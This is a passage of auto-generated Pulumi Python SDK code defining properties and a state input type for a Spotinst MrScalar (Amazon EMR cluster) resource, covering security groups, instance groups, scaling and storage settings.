def additional_primary_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of additional Amazon EC2 security group IDs for the master node.
"""
return pulumi.get(self, "additional_primary_security_groups")
@additional_primary_security_groups.setter
def additional_primary_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "additional_primary_security_groups", value)
@property
@pulumi.getter(name="additionalReplicaSecurityGroups")
def additional_replica_security_groups(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of additional Amazon EC2 security group IDs for the core and task nodes.
"""
return pulumi.get(self, "additional_replica_security_groups")
@additional_replica_security_groups.setter
def additional_replica_security_groups(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "additional_replica_security_groups", value)
@property
@pulumi.getter
def applications(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]:
"""
A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
"""
return pulumi.get(self, "applications")
@applications.setter
def applications(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]):
pulumi.set(self, "applications", value)
@property
@pulumi.getter(name="availabilityZones")
def availability_zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of AZs and their subnet Ids. See example above for usage.
"""
return pulumi.get(self, "availability_zones")
@availability_zones.setter
def availability_zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "availability_zones", value)
@property
@pulumi.getter(name="bootstrapActionsFiles")
def bootstrap_actions_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]:
"""
Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "bootstrap_actions_files")
@bootstrap_actions_files.setter
def bootstrap_actions_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]):
pulumi.set(self, "bootstrap_actions_files", value)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler cluster id.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="configurationsFiles")
def configurations_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]:
"""
Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "configurations_files")
@configurations_files.setter
def configurations_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]):
pulumi.set(self, "configurations_files", value)
@property
@pulumi.getter(name="coreDesiredCapacity")
def core_desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
amount of instances in core group.
"""
return pulumi.get(self, "core_desired_capacity")
@core_desired_capacity.setter
def core_desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_desired_capacity", value)
@property
@pulumi.getter(name="coreEbsBlockDevices")
def core_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your core group instances. Only a single block is allowed.
"""
return pulumi.get(self, "core_ebs_block_devices")
@core_ebs_block_devices.setter
def core_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]):
pulumi.set(self, "core_ebs_block_devices", value)
@property
@pulumi.getter(name="coreEbsOptimized")
def core_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "core_ebs_optimized")
@core_ebs_optimized.setter
def core_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "core_ebs_optimized", value)
@property
@pulumi.getter(name="coreInstanceTypes")
def core_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the core nodes.
"""
return pulumi.get(self, "core_instance_types")
@core_instance_types.setter
def core_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "core_instance_types", value)
@property
@pulumi.getter(name="coreLifecycle")
def core_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "core_lifecycle")
@core_lifecycle.setter
def core_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "core_lifecycle", value)
@property
@pulumi.getter(name="coreMaxSize")
def core_max_size(self) -> Optional[pulumi.Input[int]]:
"""
maximal amount of instances in core group.
"""
return pulumi.get(self, "core_max_size")
@core_max_size.setter
def core_max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_max_size", value)
@property
@pulumi.getter(name="coreMinSize")
def core_min_size(self) -> Optional[pulumi.Input[int]]:
"""
The minimal amount of instances in core group.
"""
return pulumi.get(self, "core_min_size")
@core_min_size.setter
def core_min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_min_size", value)
@property
@pulumi.getter(name="coreScalingDownPolicies")
def core_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]:
return pulumi.get(self, "core_scaling_down_policies")
@core_scaling_down_policies.setter
def core_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]):
pulumi.set(self, "core_scaling_down_policies", value)
@property
@pulumi.getter(name="coreScalingUpPolicies")
def core_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]:
return pulumi.get(self, "core_scaling_up_policies")
@core_scaling_up_policies.setter
def core_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]):
pulumi.set(self, "core_scaling_up_policies", value)
@property
@pulumi.getter(name="coreUnit")
def core_unit(self) -> Optional[pulumi.Input[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "core_unit")
@core_unit.setter
def core_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "core_unit", value)
@property
@pulumi.getter(name="customAmiId")
def custom_ami_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
"""
return pulumi.get(self, "custom_ami_id")
@custom_ami_id.setter
def custom_ami_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "custom_ami_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="ebsRootVolumeSize")
def ebs_root_volume_size(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "ebs_root_volume_size")
@ebs_root_volume_size.setter
def ebs_root_volume_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ebs_root_volume_size", value)
@property
@pulumi.getter(name="ec2KeyName")
def ec2_key_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of an Amazon EC2 key pair that can be used to ssh to the master node.
"""
return pulumi.get(self, "ec2_key_name")
@ec2_key_name.setter
def ec2_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ec2_key_name", value)
@property
@pulumi.getter(name="exposeClusterId")
def expose_cluster_id(self) -> Optional[pulumi.Input[bool]]:
"""
Allow the `cluster_id` to set a provider output variable.
"""
return pulumi.get(self, "expose_cluster_id")
@expose_cluster_id.setter
def expose_cluster_id(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "expose_cluster_id", value)
@property
@pulumi.getter(name="instanceWeights")
def instance_weights(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]:
"""
Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
"""
return pulumi.get(self, "instance_weights")
@instance_weights.setter
def instance_weights(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]):
pulumi.set(self, "instance_weights", value)
@property
@pulumi.getter(name="jobFlowRole")
def job_flow_role(self) -> Optional[pulumi.Input[str]]:
"""
The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
"""
return pulumi.get(self, "job_flow_role")
@job_flow_role.setter
def job_flow_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "job_flow_role", value)
@property
@pulumi.getter(name="keepJobFlowAlive")
def keep_job_flow_alive(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the cluster should remain available after completing all steps.
"""
return pulumi.get(self, "keep_job_flow_alive")
@keep_job_flow_alive.setter
def keep_job_flow_alive(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "keep_job_flow_alive", value)
@property
@pulumi.getter(name="logUri")
def log_uri(self) -> Optional[pulumi.Input[str]]:
"""
The path to the Amazon S3 location where logs for this cluster are stored.
"""
return pulumi.get(self, "log_uri")
@log_uri.setter
def log_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "log_uri", value)
@property
@pulumi.getter(name="managedPrimarySecurityGroup")
def managed_primary_security_group(self) -> Optional[pulumi.Input[str]]:
"""
EMR Managed Security group that will be set to the primary instance group.
"""
return pulumi.get(self, "managed_primary_security_group")
@managed_primary_security_group.setter
def managed_primary_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_primary_security_group", value)
@property
@pulumi.getter(name="managedReplicaSecurityGroup")
def managed_replica_security_group(self) -> Optional[pulumi.Input[str]]:
"""
EMR Managed Security group that will be set to the replica instance group.
"""
return pulumi.get(self, "managed_replica_security_group")
@managed_replica_security_group.setter
def managed_replica_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_replica_security_group", value)
@property
@pulumi.getter(name="masterEbsBlockDevices")
def master_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your master group instances. Only a single block is allowed.
"""
return pulumi.get(self, "master_ebs_block_devices")
@master_ebs_block_devices.setter
def master_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]):
pulumi.set(self, "master_ebs_block_devices", value)
@property
@pulumi.getter(name="masterEbsOptimized")
def master_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "master_ebs_optimized")
@master_ebs_optimized.setter
def master_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "master_ebs_optimized", value)
@property
@pulumi.getter(name="masterInstanceTypes")
def master_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the master nodes.
"""
return pulumi.get(self, "master_instance_types")
@master_instance_types.setter
def master_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "master_instance_types", value)
@property
@pulumi.getter(name="masterLifecycle")
def master_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "master_lifecycle")
@master_lifecycle.setter
def master_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "master_lifecycle", value)
@property
@pulumi.getter(name="masterTarget")
def master_target(self) -> Optional[pulumi.Input[int]]:
"""
Number of instances in the master group.
"""
return pulumi.get(self, "master_target")
@master_target.setter
def master_target(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "master_target", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The application name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="provisioningTimeout")
def provisioning_timeout(self) -> Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]:
return pulumi.get(self, "provisioning_timeout")
@provisioning_timeout.setter
def provisioning_timeout(self, value: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]):
pulumi.set(self, "provisioning_timeout", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler region.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="releaseLabel")
def release_label(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "release_label")
@release_label.setter
def release_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "release_label", value)
@property
@pulumi.getter(name="repoUpgradeOnBoot")
def repo_upgrade_on_boot(self) -> Optional[pulumi.Input[str]]:
"""
Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
"""
return pulumi.get(self, "repo_upgrade_on_boot")
@repo_upgrade_on_boot.setter
def repo_upgrade_on_boot(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "repo_upgrade_on_boot", value)
@property
@pulumi.getter
def retries(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
"""
return pulumi.get(self, "retries")
@retries.setter
def retries(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retries", value)
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]:
"""
An array of scheduled tasks.
"""
return pulumi.get(self, "scheduled_tasks")
@scheduled_tasks.setter
def scheduled_tasks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]):
pulumi.set(self, "scheduled_tasks", value)
@property
@pulumi.getter(name="securityConfig")
def security_config(self) -> Optional[pulumi.Input[str]]:
"""
The name of the security configuration applied to the cluster.
"""
return pulumi.get(self, "security_config")
@security_config.setter
def security_config(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "security_config", value)
@property
@pulumi.getter(name="serviceAccessSecurityGroup")
def service_access_security_group(self) -> Optional[pulumi.Input[str]]:
"""
The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
"""
return pulumi.get(self, "service_access_security_group")
@service_access_security_group.setter
def service_access_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_access_security_group", value)
@property
@pulumi.getter(name="serviceRole")
def service_role(self) -> Optional[pulumi.Input[str]]:
"""
The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
"""
return pulumi.get(self, "service_role")
@service_role.setter
def service_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_role", value)
@property
@pulumi.getter(name="stepsFiles")
def steps_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]:
"""
Steps from S3.
"""
return pulumi.get(self, "steps_files")
@steps_files.setter
def steps_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]):
pulumi.set(self, "steps_files", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]:
"""
A list of tags to assign to the resource. You may define multiple tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="taskDesiredCapacity")
def task_desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
amount of instances in task group.
"""
return pulumi.get(self, "task_desired_capacity")
@task_desired_capacity.setter
def task_desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_desired_capacity", value)
@property
@pulumi.getter(name="taskEbsBlockDevices")
def task_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your task group instances. Only a single block is allowed.
"""
return pulumi.get(self, "task_ebs_block_devices")
@task_ebs_block_devices.setter
def task_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]):
pulumi.set(self, "task_ebs_block_devices", value)
@property
@pulumi.getter(name="taskEbsOptimized")
def task_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "task_ebs_optimized")
@task_ebs_optimized.setter
def task_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "task_ebs_optimized", value)
@property
@pulumi.getter(name="taskInstanceTypes")
def task_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the task nodes.
"""
return pulumi.get(self, "task_instance_types")
@task_instance_types.setter
def task_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "task_instance_types", value)
@property
@pulumi.getter(name="taskLifecycle")
def task_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "task_lifecycle")
@task_lifecycle.setter
def task_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "task_lifecycle", value)
@property
@pulumi.getter(name="taskMaxSize")
def task_max_size(self) -> Optional[pulumi.Input[int]]:
"""
maximal amount of instances in task group.
"""
return pulumi.get(self, "task_max_size")
@task_max_size.setter
def task_max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_max_size", value)
@property
@pulumi.getter(name="taskMinSize")
def task_min_size(self) -> Optional[pulumi.Input[int]]:
"""
The minimal amount of instances in task group.
"""
return pulumi.get(self, "task_min_size")
@task_min_size.setter
def task_min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_min_size", value)
@property
@pulumi.getter(name="taskScalingDownPolicies")
def task_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]:
return pulumi.get(self, "task_scaling_down_policies")
@task_scaling_down_policies.setter
def task_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]):
pulumi.set(self, "task_scaling_down_policies", value)
@property
@pulumi.getter(name="taskScalingUpPolicies")
def task_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]:
return pulumi.get(self, "task_scaling_up_policies")
@task_scaling_up_policies.setter
def task_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]):
pulumi.set(self, "task_scaling_up_policies", value)
@property
@pulumi.getter(name="taskUnit")
def task_unit(self) -> Optional[pulumi.Input[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "task_unit")
@task_unit.setter
def task_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "task_unit", value)
@property
@pulumi.getter(name="terminationPolicies")
def termination_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]:
"""
Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
"""
return pulumi.get(self, "termination_policies")
@termination_policies.setter
def termination_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]):
pulumi.set(self, "termination_policies", value)
@property
@pulumi.getter(name="terminationProtected")
def termination_protected(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
return pulumi.get(self, "termination_protected")
@termination_protected.setter
def termination_protected(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "termination_protected", value)
@property
@pulumi.getter(name="visibleToAllUsers")
def visible_to_all_users(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "visible_to_all_users")
@visible_to_all_users.setter
def visible_to_all_users(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "visible_to_all_users", value)
@pulumi.input_type
class _MrScalarState:
def __init__(__self__, *,
additional_info: Optional[pulumi.Input[str]] = None,
additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
applications: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]] = None,
availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]] = None,
core_desired_capacity: Optional[pulumi.Input[int]] = None,
core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]] = None,
core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
core_lifecycle: Optional[pulumi.Input[str]] = None,
core_max_size: Optional[pulumi.Input[int]] = None,
core_min_size: Optional[pulumi.Input[int]] = None,
core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]] = None,
core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]] = None,
core_unit: Optional[pulumi.Input[str]] = None,
custom_ami_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
ec2_key_name: Optional[pulumi.Input[str]] = None,
expose_cluster_id: Optional[pulumi.Input[bool]] = None,
instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]] = None,
job_flow_role: Optional[pulumi.Input[str]] = None,
keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
log_uri: Optional[pulumi.Input[str]] = None,
managed_primary_security_group: Optional[pulumi.Input[str]] = None,
managed_replica_security_group: Optional[pulumi.Input[str]] = None,
master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]] = None,
master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
master_lifecycle: Optional[pulumi.Input[str]] = None,
master_target: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
output_cluster_id: Optional[pulumi.Input[str]] = None,
provisioning_timeout: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']] = None,
region: Optional[pulumi.Input[str]] = None,
release_label: Optional[pulumi.Input[str]] = None,
repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
retries: Optional[pulumi.Input[int]] = None,
scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]] = None,
security_config: Optional[pulumi.Input[str]] = None,
service_access_security_group: Optional[pulumi.Input[str]] = None,
service_role: Optional[pulumi.Input[str]] = None,
steps_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]] = None,
strategy: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]] = None,
task_desired_capacity: Optional[pulumi.Input[int]] = None,
task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]] = None,
task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
task_lifecycle: Optional[pulumi.Input[str]] = None,
task_max_size: Optional[pulumi.Input[int]] = None,
task_min_size: Optional[pulumi.Input[int]] = None,
task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]] = None,
task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]] = None,
task_unit: Optional[pulumi.Input[str]] = None,
termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]] = None,
termination_protected: Optional[pulumi.Input[bool]] = None,
visible_to_all_users: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering MrScalar resources.
:param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
:param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[str] cluster_id: The MrScaler cluster id.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
:param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
:param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
:param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
:param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
:param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
:param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
:param pulumi.Input[str] description: The MrScaler description.
:param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
:param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
:param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
:param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
:param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
:param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
:param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
:param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
:param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
:param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
:param pulumi.Input[int] master_target: Number of instances in the master group.
:param pulumi.Input[str] name: The application name.
:param pulumi.Input[str] region: The MrScaler region.
:param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
:param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
:param pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]] scheduled_tasks: An array of scheduled tasks.
:param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
